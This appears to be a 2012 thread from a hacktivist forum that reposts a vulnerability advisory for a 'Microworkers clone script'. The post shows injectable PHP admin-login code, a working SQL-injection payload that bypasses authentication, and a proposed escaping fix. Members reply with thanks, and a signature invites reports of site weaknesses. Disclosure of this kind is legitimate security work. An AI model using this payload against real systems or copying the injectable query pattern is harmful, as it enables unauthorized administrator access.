Anti-armenia.ORG - Forumlar - Annexwaretexolution SQL Injection/Microworkers clone script



Istifadəçi
    2012-06-18 00:44 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Kod:
=============================================================
Microworkers clone script by: Annexwaretexolution ( http://www.annexware.com/ )
Official site seems down for now alternatively you can find this script in eg from here:
http://clonesite.do.am/load/0-0-1-163-20
or from google.
=============================================================
Microworkers clone script by: Annexwaretexolution ( http://www.annexware.com/ )  is prone to SQL injection vulnerability.
=============================================================
Vuln Desc:
While online penetration testing this script i managed to find SQL injection vulnerability in it which leads to Auth Bypass without knowing valid password for administrator account.
Here we go:

//administrator/loginshed.php
======================Vulnerable Code Section:=====================
<?php     
  include('../settings/config.php');
 
  $username= $_POST["username"];
  $password= $_POST["password"];
 
  $sql="SELECT * FROM `adminlogin` WHERE `username`='".$username."' and `password`= '".base64_encode($password)."' ; ";
  $res=dbQuery($sql) or die(mysql_error().$sql);
  $rec=dbNumRows($res);
  if($rec > 0)
  {
    $s = dbQuery("update `adminlogin` set `logintime`= '".$totaldate."' where `username`='".$username."' ; ");
    $_SESSION["adminusername"]=$username;
    header("location: adminhome.php");
  }
  else
  {
    header("location: index.php?msg=error");
  }   
?>
==================EOF Vulnerable Code Section:=========================
======================GPC=OFF====================================


Exploit:
Login: admin'or''='
Password:whateveryouwant

==================================================================

Fix:
Open administrator/loginshed.php and replace variables:

  $username= $_POST["username"];
  $password= $_POST["password"];

with this:

$username= mysql_real_escape_string(htmlentities($_POST["username"]));
$password= mysql_real_escape_string(htmlentities($_POST["password"]));

================================================================
[+]Vendor notified about issuse.
================================================================
[-]No Dork for scriptkiddiez.
================================================================


+++++++++My Sincerely Thanks to:+++++++++++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
to all AA Team + to all Azerbaijan Black HatZ + Especially to my bro CAMOUFL4G3.
++++++++++++++++++++++++++++++++++++++++++++++++

Respect && Thank you.

/AkaStep ^_^
e]



http://packetstormsecurity.org/files/113799/Annexwaretexolution-SQL-Injection.html

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-06-18 08:39 GMT                 

AzerbaijaniAttacker



İstifadəçi
Mesaj Sayı : 45
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Thanks Bro Əllərinə saqliq

Anti-armenia.ORG
    

Istifadəçi
    2012-06-18 09:41 GMT                 

Ferid23



Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Əllərinə sağlıq

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG